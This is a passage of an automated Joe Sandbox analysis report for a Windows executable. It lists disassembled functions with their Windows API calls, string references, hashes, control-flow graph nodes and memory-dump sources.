                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocExceptionFailFastHandleInformationModuleObjectQueryRaise
                                                                                                                                                                        • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                                                                                                                                                                        • API String ID: 3403879507-2841289747
                                                                                                                                                                        • Opcode ID: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
                                                                                                                                                                        • Instruction ID: 13efd58772c9a648a159fa9da1b5ce6179f3e2b234ac625f505f19ef33921cad
                                                                                                                                                                        • Opcode Fuzzy Hash: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
                                                                                                                                                                        • Instruction Fuzzy Hash: 45416C33E3C683C5EA40AB69A802EB963A1AF51B84F584171ED4DD7696DF2CF406C7D0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF67FA455E6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFailFastRaise$Sleep
                                                                                                                                                                        • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                                                                                                                                        • API String ID: 3706814929-926682358
                                                                                                                                                                        • Opcode ID: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
                                                                                                                                                                        • Instruction ID: d15a904811fa749a1f2056561df4dd2494a9daec91677c17e913652d938ca052
                                                                                                                                                                        • Opcode Fuzzy Hash: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
                                                                                                                                                                        • Instruction Fuzzy Hash: A4412B37A39A42C6EF909F19E840B7A33A5EB45B84F144139DA9DC23A0DF3DE495C781

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Thread$CloseCreateHandlePriorityResume
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3633986771-0
                                                                                                                                                                        • Opcode ID: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
                                                                                                                                                                        • Instruction ID: 691832ce696eb9dbf0eff863e14803b1ed304c891524f16a44cb0befe56db358
                                                                                                                                                                        • Opcode Fuzzy Hash: 2473f1295a42763cfd341b8cfd7a40992b87c44e5d7ed509368ee88b1d319611
                                                                                                                                                                        • Instruction Fuzzy Hash: BFE092A6E2970283FB149B21F8197356750BF9AF95F4C4034CE5E57360EF3D91CA8640

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 578 7ff67fa50e30-7ff67fa50e61 579 7ff67fa50e67-7ff67fa50e82 GetCurrentProcess call 7ff67faaa95e 578->579 580 7ff67fa50f1f-7ff67fa50f3c GlobalMemoryStatusEx 578->580 579->580 595 7ff67fa50e88-7ff67fa50e90 579->595 582 7ff67fa50fc2-7ff67fa50fc5 580->582 583 7ff67fa50f42-7ff67fa50f45 580->583 584 7ff67fa50fc7-7ff67fa50fcb 582->584 585 7ff67fa50fce-7ff67fa50fd1 582->585 587 7ff67fa50f47-7ff67fa50f52 583->587 588 7ff67fa50fb1-7ff67fa50fb4 583->588 584->585 593 7ff67fa50fdb-7ff67fa50fde 585->593 594 7ff67fa50fd3-7ff67fa50fd8 585->594 589 7ff67fa50f5b-7ff67fa50f6c 587->589 590 7ff67fa50f54-7ff67fa50f59 587->590 591 7ff67fa50fb6 588->591 592 7ff67fa50fb9-7ff67fa50fbc 588->592 598 7ff67fa50f70-7ff67fa50f81 589->598 590->598 591->592 599 7ff67fa50fe8-7ff67fa5100b call 7ff67faaacf0 592->599 600 7ff67fa50fbe-7ff67fa50fc0 592->600 593->599 601 7ff67fa50fe0 593->601 594->593 596 7ff67fa50efa-7ff67fa50eff 595->596 597 7ff67fa50e92-7ff67fa50e98 595->597 608 7ff67fa50f11-7ff67fa50f14 596->608 609 7ff67fa50f01-7ff67fa50f04 596->609 603 7ff67fa50e9a-7ff67fa50e9f 597->603 604 7ff67fa50ea1-7ff67fa50eb5 597->604 606 7ff67fa50f8a-7ff67fa50f9e 598->606 607 7ff67fa50f83-7ff67fa50f88 598->607 602 7ff67fa50fe5 600->602 601->602 602->599 610 7ff67fa50eb9-7ff67fa50eca 603->610 604->610 612 7ff67fa50fa2-7ff67fa50fae 606->612 607->612 608->599 615 7ff67fa50f1a 608->615 613 7ff67fa50f0b-7ff67fa50f0e 609->613 614 7ff67fa50f06-7ff67fa50f09 609->614 616 7ff67fa50ecc-7ff67fa50ed1 610->616 617 7ff67fa50ed3-7ff67fa50ee7 610->617 612->588 613->608 614->608 615->602 618 7ff67fa50eeb-7ff67fa50ef7 616->618 617->618 618->596
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentGlobalMemoryProcessStatus
                                                                                                                                                                        • String ID: @
                                                                                                                                                                        • API String ID: 3261791682-2766056989
                                                                                                                                                                        • Opcode ID: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
                                                                                                                                                                        • Instruction ID: a2f00c433eacd884cdf808a0d702d03e3f7f58074c9a3d608199592bbfd9db05
                                                                                                                                                                        • Opcode Fuzzy Hash: c50f9f1349a2f10861f7ecfcf3d9fa8d7e1c5a7709ec8babca00959837fe57fa
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D410423B2DB4782E956CA369111B399792AF5ABC0F18C231ED4EA3744FF3CE4C58650

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA82360
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA823D6
                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA8242B
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF67FA6F9D9,?,?,?,?,?,00007FF67FA7E9FF,?,?,?,00007FF67FA588C3), ref: 00007FF67FA82451
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
                                                                                                                                                                        • Instruction ID: 9b79ab3583bb7c44f7ff79e976a282a422ea20c517da91eedffab3337caa97c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f26acfbe39efda905e31c116d58f05a84f1c8e613b3a673d8beab4140165067
                                                                                                                                                                        • Instruction Fuzzy Hash: 61317E63E2C692C1EA12DF15E850BBA2390FF61B54F985136E94DC7691DEBCE481C3E0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF67FA551C8,?,?,0000000A,00007FF67FA54220,?,?,00000000,00007FF67FA4DBB1), ref: 00007FF67FA51707
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF67FA551C8,?,?,0000000A,00007FF67FA54220,?,?,00000000,00007FF67FA4DBB1), ref: 00007FF67FA51727
                                                                                                                                                                        • VirtualAllocExNuma.KERNEL32 ref: 00007FF67FA51748
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual$CurrentNumaProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 647533253-0
                                                                                                                                                                        • Opcode ID: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
                                                                                                                                                                        • Instruction ID: f25d1ae47c9e31e4d354f8ae442d82ebcbb572339a39792594b977f162e8c8c6
                                                                                                                                                                        • Opcode Fuzzy Hash: 50d61e69d9914c3b35ffaae00cb017ff4e997f9ad39ea175855d1aa7930a3df2
                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF0C272B186D182EB208F06F400629AB60BB4AFD4F484138EF8C57B58DF3DD5C18B00

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Count64Tick
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1927824332-0
                                                                                                                                                                        • Opcode ID: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
                                                                                                                                                                        • Instruction ID: 82438b9f281665842ab653f2ddbf6dde1de8963030069a79aa995aced563652b
                                                                                                                                                                        • Opcode Fuzzy Hash: 65d7cefa01567033c58624f5b2484fdd1bfa5fa806f089eb6f936ec28982fb97
                                                                                                                                                                        • Instruction Fuzzy Hash: F841BD33E3D686C5FA249B25A554E7A33A9AF01B84F044932D90DE37A1DE3CE681C6C0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF67FAAAC51,?,?,?,?,00007FF67FA4FCD1,?,?,?,00007FF67FA50254,00000000,00000020,?), ref: 00007FF67FAAB62A
                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67FAAB640
                                                                                                                                                                          • Part of subcall function 00007FF67FAAB924: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF67FAAB92D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 205171174-0
                                                                                                                                                                        • Opcode ID: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
                                                                                                                                                                        • Instruction ID: 96a39c1bc57967611e1283b2bf8cc3ee6ed42df7d29a7b71cc69475205c5962f
                                                                                                                                                                        • Opcode Fuzzy Hash: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
                                                                                                                                                                        • Instruction Fuzzy Hash: B0E0EC02E39347C1F959216A55A68B403C00F583F0E1C2B30D93EC52C2AD2CA45E41D0

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1148 7ff67fa67a30-7ff67fa67a64 call 7ff67fa82480 1150 7ff67fa67a69-7ff67fa67a72 1148->1150 1151 7ff67fa67a82-7ff67fa67a84 1150->1151 1152 7ff67fa67a74-7ff67fa67a76 1150->1152 1153 7ff67fa67a8c 1151->1153 1154 7ff67fa67a86-7ff67fa67a8a 1151->1154 1152->1154 1155 7ff67fa67a78-7ff67fa67a80 1152->1155 1156 7ff67fa67a90-7ff67fa67aa1 call 7ff67faaf5b0 1153->1156 1154->1156 1157 7ff67fa67aa5-7ff67fa67aab 1155->1157 1156->1157 1159 7ff67fa67b6e-7ff67fa67b83 1157->1159 1160 7ff67fa67ab1-7ff67fa67abb 1157->1160 1161 7ff67fa67bad-7ff67fa67bd9 call 7ff67fa67cf0 1159->1161 1162 7ff67fa67b85-7ff67fa67b8d 1159->1162 1164 7ff67fa67b69 1160->1164 1165 7ff67fa67ac1-7ff67fa67ac3 1160->1165 1166 7ff67fa67b9c-7ff67fa67bab 1162->1166 1167 7ff67fa67b8f 1162->1167 1164->1159 1165->1164 1169 7ff67fa67ac9-7ff67fa67acf 1165->1169 1166->1161 1166->1162 1170 7ff67fa67b90-7ff67fa67b9a 1167->1170 1172 7ff67fa67aef-7ff67fa67b24 1169->1172 1173 7ff67fa67ad1-7ff67fa67ae7 1169->1173 1170->1166 1170->1170 1172->1164 1174 7ff67fa67b26-7ff67fa67b30 call 7ff67fa51770 1172->1174 1173->1172 1174->1164 1177 7ff67fa67b32-7ff67fa67b3a 1174->1177 1177->1164 1178 7ff67fa67b3c-7ff67fa67b64 EnterCriticalSection LeaveCriticalSection 1177->1178 1178->1164
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF67FA82480: EnterCriticalSection.KERNEL32(?,?,?,00007FF67FA67A69), ref: 00007FF67FA824C4
                                                                                                                                                                          • Part of subcall function 00007FF67FA82480: LeaveCriticalSection.KERNEL32(?,?,?,00007FF67FA67A69), ref: 00007FF67FA824EE
                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00007FF67FA67B43
                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00007FF67FA67B64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
                                                                                                                                                                        • Instruction ID: a8400c090c3fda09cc2b4db3f2ffc24302c9c83a2fa883fed163bb937276c332
                                                                                                                                                                        • Opcode Fuzzy Hash: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C414D62A3864282EA148B29D950A7623A4AF16FF4F145335EA7DC76D5EE2CE441C3C0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        • Opcode ID: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
                                                                                                                                                                        • Instruction ID: a6cb43a4049937e12d2c1989226213b43fb82c2866b01a4e64330b8292c49a6f
                                                                                                                                                                        • Opcode Fuzzy Hash: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3631DF33B25B52C2EA14CB1AA50057A67E4FB49BD0F048135DF4C97B95EF38E5A28380
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                                        • Opcode ID: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
                                                                                                                                                                        • Instruction ID: a85286fc8643a7771546ad868dbb6d4037072467ce778cdf666b27e4f68d664f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01B163D2C6D290F6219714F884ABA37D0AF52BA0F585131E85DC35A18E2CE8C1C3D0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2087232378-0
